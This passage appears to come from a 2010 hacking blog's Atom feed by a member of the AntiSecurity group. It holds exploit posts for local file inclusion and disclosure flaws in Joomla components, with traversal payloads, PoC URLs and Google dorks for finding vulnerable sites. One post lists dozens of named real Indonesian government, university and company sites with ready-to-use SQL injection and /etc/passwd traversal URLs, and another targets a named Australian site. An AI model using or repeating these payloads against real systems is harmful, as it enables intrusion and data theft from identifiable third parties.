href="http://pacenoge.org/vid/rce_cgi.html"&gt;HERE&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;download the video &lt;a href="http://pacenoge.org/vid/rce_cgi.swf"&gt;HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2860199223929012565?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2860199223929012565/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2860199223929012565' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2860199223929012565'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2860199223929012565'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/09/remote-command-execute-at-cgi-script.html' title='Remote Command Execute [at] CGI Script [video]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3307286914652840301</id><published>2010-09-13T13:17:00.003+07:00</published><updated>2010-09-13T13:30:35.767+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>ABHIMANYU INFOTECH LFI Vuln [private script]</title><content type='html'>[o] ABHIMANYU INFOTECH Local File Inclusion Vulnerability&lt;br /&gt;&lt;br /&gt;Author : NoGe&lt;br /&gt;Contact : noge[dot]code[at]gmail[dot]com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] Vulnerable File&lt;br /&gt;&lt;br /&gt;index.php&lt;br /&gt;&lt;br /&gt;&lt;?&lt;br /&gt; if(isset($_REQUEST['file']))&lt;br /&gt; {&lt;br /&gt;     $file=$_REQUEST['file'];&lt;br /&gt; }&lt;br /&gt; else&lt;br /&gt; {&lt;br /&gt;     $file="home.php";&lt;br /&gt; }&lt;br /&gt; ?&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;[o] Exploit&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/index.php?file=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] Dork&lt;br /&gt;&lt;br /&gt;"ABHIMANYU INFOTECH"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3307286914652840301?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3307286914652840301/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3307286914652840301' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3307286914652840301'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3307286914652840301'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/09/abhimanyu-infotech-lfi-vuln-private.html' title='ABHIMANYU INFOTECH LFI Vuln [private script]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-7949882677773817666</id><published>2010-07-05T11:05:00.007+07:00</published><updated>2010-07-05T11:17:40.804+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>e107 Code Exec in contact.php [video]</title><content type='html'>e107 is a content management system written in PHP and using the popular open source MySQL database system for content storage. It's completely free, totally customisable and in constant development.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;here is the exploit by McFly&lt;br /&gt;&lt;a href="http://www.exploit-db.com/exploits/12715/"&gt;http://www.exploit-db.com/exploits/12715/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;in this video i do it manually with mozilla addons [Live HTTP Headers]&lt;br /&gt;&lt;br /&gt;greetz to &lt;a href="http://antisecurity.org/"&gt;AntiSecurity&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;watch the video &lt;a href="http://pacenoge.org/vid/e107.html"&gt;HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;download it &lt;a href="http://pacenoge.org/vid/e107.swf"&gt;HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-7949882677773817666?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/7949882677773817666/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=7949882677773817666' title='13 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7949882677773817666'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7949882677773817666'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/07/e107-code-exec-in-contactphp-video.html' title='e107 Code Exec in contact.php [video]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6978967976131895780</id><published>2010-07-02T03:43:00.004+07:00</published><updated>2010-07-02T03:55:03.469+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>php://input Injection [video]</title><content type='html'>&lt;var class="filename"&gt;php://input&lt;/var&gt; allows you to read raw POST data.    It is a less memory intensive alternative to    &lt;var class="varname"&gt;&lt;var class="varname"&gt;&lt;a href="http://www.php.net/manual/en/reserved.variables.httprawpostdata.php" class="classname"&gt;$HTTP_RAW_POST_DATA&lt;/a&gt;&lt;/var&gt;&lt;/var&gt; and does not need any    special &lt;var class="filename"&gt;php.ini&lt;/var&gt; directives.    &lt;var class="filename"&gt;php://input&lt;/var&gt; is not available with    &lt;i&gt;enctype="multipart/form-data"&lt;/i&gt;. &lt;span class="simpara"&gt;&lt;var class="filename"&gt;php://input&lt;/var&gt; can only be read once.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;greetz to &lt;a href="http://antisecurity.org"&gt;AntiSecurity&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;watch the video &lt;a href="http://pacenoge.org/vid/php_input.html"&gt;HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;download the video &lt;a href="http://pacenoge.org/vid/php_input.swf"&gt;HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;  &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6978967976131895780?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6978967976131895780/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6978967976131895780' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6978967976131895780'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6978967976131895780'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/07/phpinput-injection-video.html' title='php://input Injection [video]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1781054346022670923</id><published>2010-06-29T00:14:00.004+07:00</published><updated>2010-06-29T00:22:01.991+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>Indonesian Vuln Sites [ part five ]</title><content type='html'>http://www.dikmenum.go.id/dataapp/datapokok/index.php?module=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;http://www.kontras.org/index.php?hal=siaran_pers&amp;amp;id=1058+and+1=2+union+all+select+1,database(),3,4,version(),6,7--&lt;br /&gt;&lt;br /&gt;http://www.logos-institute.com/index.php?menu=pagealumni&amp;amp;idangkatan=1+and+1=2+union+all+select+database(),version()--&lt;br /&gt;&lt;br /&gt;http://fkk.umj.ac.id/index.php?module=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;http://se.unikom.ac.id/artikel.php?id=3+and+1=2+union+all+select+1,database(),user(),version(),5--&amp;amp;tipe=detail&lt;br /&gt;&lt;br /&gt;http://lisaanashidqin.or.id/index.php?nid=19+AND+1=2+UNION+ALL+SELECT+1,version(),3,4,5,6,7--&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;http://www.slickbar.co.id/index.php?page=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;http://www.beraucoal.co.id/newsdetail.php?idNews=16+AND+1=2+UNION+SELECT+1,2,version(),4,database(),user(),7--&lt;br /&gt;&lt;br /&gt;http://www.vision.co.id/vision/detail_career.php?id=16+and+1=2+union+all+select+1,version(),3,user(),database()--&lt;br /&gt;&lt;br /&gt;http://www.stiki.ac.id/index.php?modules=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;http://pusdiklat.pnri.go.id/detail.php?ID=165+AND+1=2+UNION+ALL+SELECT+1,version(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--&lt;br /&gt;&lt;br /&gt;http://interior.fs.uns.ac.id/config/artikel.php?id=9+AND+1=2+UNION+ALL+SELECT+1,2,3,version()--&lt;br /&gt;&lt;br /&gt;http://www.dmcindonesia.web.id/?lang=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;http://www.smkpgrimojoagung.sch.id/artikel.php?id=4+AND+1=2+UNION+ALL+SELECT+1,version(),database(),4,5--&lt;br /&gt;&lt;br /&gt;http://www.bc-club.co.id/artikel.php?id=1+AND+1=2+UNION+ALL+SELECT+1,version(),database(),4,user()--&lt;br /&gt;&lt;br /&gt;http://pustaka.ut.ac.id/puslata/index.php?menu=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;http://iib.diknas.go.id/info.php?id=1+AND+1=2+UNION+ALL+SELECT+1,version(),user(),4,database(),6,7--&lt;br /&gt;&lt;br /&gt;http://www.astragraphia.co.id/EN/newsroom/newsdetail.php?id=195+and+1=2+union+select+database(),version(),3--&amp;amp;ntype=5&lt;br /&gt;&lt;br /&gt;http://insentif.ristek.go.id/download.php?file=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;http://dymarjaya.co.id/newsdetail.php?id=10+AND+1=2+UNION+ALL+SELECT+1,2,version()--&lt;br /&gt;&lt;br /&gt;http://www.dataglobal.co.id/newsdetail.php?id=70+AND+1=2+UNION+ALL+SELECT+1,2,3,version(),5,database(),7,user()--&lt;br /&gt;&lt;br /&gt;http://dwp.kbri-islamabad.go.id/main.php?page=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;http://www.earthhour.wwf.or.id/news_detail.php?id=155+AND+1=2+UNION+ALL+SELECT+1,version(),3,4,database()--&lt;br /&gt;&lt;br /&gt;http://digilib.biologi.lipi.go.id/indexdisc.php?topic_id=29+AND+1=2+UNION+ALL+SELECT+1,2,3,4,version(),6,7,8,9,database(),user()--&lt;br /&gt;&lt;br /&gt;http://www.lpmpjabar.go.id/otomilib/index.php?menu=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;http://www.acbi.co.id/articledetail.php?cat=&amp;amp;id=17+and+1=2+union+select+1,version(),database(),user(),5,6--&lt;br /&gt;&lt;br /&gt;http://www.otorita-asahan.go.id/berita.php?id=56+AND+1=2+UNION+ALL+SELECT+version(),database(),3,4--&lt;br /&gt;&lt;br /&gt;http://web.ptpn7.com/?lang=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf&lt;br /&gt;&lt;br /&gt;http://www.kpbptpn.co.id/news.php?news_id=4720+AND+1=2+UNION+ALL+SELECT+1,2,version(),user(),database(),6,7,8,9,10,11,12,13--&lt;br /&gt;&lt;br /&gt;http://lemlit.uny.ac.id/sipen/main/index.php?pageID=2&amp;amp;kode_proposal=3122+and+1=2+union+select+1,2,version(),database(),5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--&lt;br /&gt;&lt;br /&gt;http://rehab.ditptksd.go.id/index.php?module=../../../../../../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;http://aslimotorgroup.co.id/berita-selengkapnya.php?id=31+AND+1=2+UNION+SELECT+1,version(),3,database(),user(),6--&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;blind sqli&lt;br /&gt;&lt;br /&gt;http://www.dk.co.id/new/index.php?id=11+and+1=2+union+all+select+1,2,3--&amp;amp;page=Reseller%20Hosting&lt;br /&gt;&lt;br /&gt;http://www.impulse.or.id/artikel.php?id=6&lt;br /&gt;&lt;br /&gt;http://www.samudra.co.id/new/detail.php?det=34&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1781054346022670923?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1781054346022670923/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1781054346022670923' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1781054346022670923'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1781054346022670923'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/06/indonesian-vuln-sites-part-five.html' title='Indonesian Vuln Sites [ part five ]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2274937484855859830</id><published>2010-05-13T19:59:00.002+07:00</published><updated>2010-05-13T20:30:36.116+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>SeberCart LFD Vuln [ readfile() ]</title><content type='html'>&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] Joomla Component Seber Cart Local File Disclosure Vulnerability&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Software : com_sebercart&lt;br /&gt;Vendor : http://www.seber.com.au/&lt;br /&gt;Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact : public[at]antisecurity[dot]org&lt;br /&gt;Home : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://localhost/[path]/components/com_sebercart/getPic.php?p=../../configuration.php&lt;br /&gt;&lt;br /&gt;Download image.jpg file and open it with notepad or gedit.&lt;br /&gt;You will see joomla configuration there.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;http://www.rare-earth.com.au/components/com_sebercart/getPic.php?p=../../configuration.php&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;code class="plain plain"&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2274937484855859830?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2274937484855859830/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2274937484855859830' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2274937484855859830'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2274937484855859830'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/05/sebercart-lfd-vuln-readfile.html' title='SeberCart LFD Vuln [ readfile() ]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-5490045544218266244</id><published>2010-04-22T23:40:00.004+07:00</published><updated>2010-04-22T23:47:24.107+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>LFI Local Upload Form [video]</title><content type='html'>another video tutorial by AntiSecurity Team&lt;br /&gt;this video still using Tamper Data &amp;amp; /proc/self/environ&lt;br /&gt;but this time we use upload form... :))&lt;br /&gt;&lt;br /&gt;big thanks to Vrs-hCk a.k.a ander for the idea ^^&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;watch the video here&lt;br /&gt;&lt;a href="http://pacenoge.org/vid/upload_form.html"&gt;http://pacenoge.org/vid/upload_form.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;download here&lt;br /&gt;&lt;a href="http://pacenoge.org/vid/upload_form.swf"&gt;http://pacenoge.org/vid/upload_form.swf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;upload form script&lt;br /&gt;&lt;a href="http://pacenoge.org/tool/upload_form.txt"&gt;http://pacenoge.org/tool/upload_form.txt&lt;/a&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-5490045544218266244?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/5490045544218266244/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=5490045544218266244' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/5490045544218266244'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/5490045544218266244'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/lfi-local-upload-form-video.html' title='LFI Local Upload Form [video]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-887434931725207110</id><published>2010-04-15T02:09:00.003+07:00</published><updated>2010-04-15T02:15:18.017+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><category scheme='http://www.blogger.com/atom/ns#' term='mixed'/><title type='text'>AntiSecurity Vulnerability Alert</title><content type='html'>if you wanna see our new bug, you can see it here..&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.exploit-db.com/author/AntiSecurity"&gt;http://www.exploit-db.com/author/AntiSecurity&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;i'm too lazy to post here one by one.. :))&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./NoGe&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-887434931725207110?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/887434931725207110/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=887434931725207110' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/887434931725207110'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/887434931725207110'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/antisecurity-vulnerability-alert.html' title='AntiSecurity Vulnerability Alert'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-7511662887178929694</id><published>2010-04-11T14:18:00.001+07:00</published><updated>2010-04-11T14:20:17.320+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component JA Job Board Multiple LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component JA Job Board Multiple Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_jajobboard version 1.4.4&lt;br /&gt;Vendor   : http://jobboard.joomlart.com/&lt;br /&gt;Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_jajobboard&amp;amp;view=[LFI]&lt;br /&gt;http://localhost/[path]/index.php?option=com_jajobboard&amp;amp;controller=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_jajobboard&amp;amp;view=../../../../../../../../../../etc/passwd&lt;br /&gt;http://localhost/[path]/index.php?option=com_jajobboard&amp;amp;controller=../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;inru:"com_jajobboard"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-7511662887178929694?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/7511662887178929694/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=7511662887178929694' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7511662887178929694'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7511662887178929694'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-ja-job-board-multiple.html' title='Joomla Component JA Job Board Multiple LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1656997055392362225</id><published>2010-04-11T14:16:00.001+07:00</published><updated>2010-04-11T14:18:32.449+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Preventive And Reservation LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Preventive And Reservation Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_preventive version 1.0.5&lt;br /&gt;Vendor   : http://www.joomla.ternaria.com/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[at]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/index.php?option=com_preventive&amp;amp;controller=[LFI]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;br /&gt;http://localhost/index.php?option=com_preventive&amp;amp;controller==../../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;br /&gt;inurl:"com_preventive"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1656997055392362225?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1656997055392362225/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1656997055392362225' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1656997055392362225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1656997055392362225'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-preventive-and.html' title='Joomla Component Preventive And Reservation LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2926130297087989157</id><published>2010-04-11T14:14:00.000+07:00</published><updated>2010-04-11T14:16:31.174+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Jfeedback! LFI Vuln</title><content type='html'>&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Jfeedback! Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_jfeedback version 1.2&lt;br /&gt;Vendor   : http://www.joomla.ternaria.com/&lt;br /&gt;Author   : AntiSecurity [ 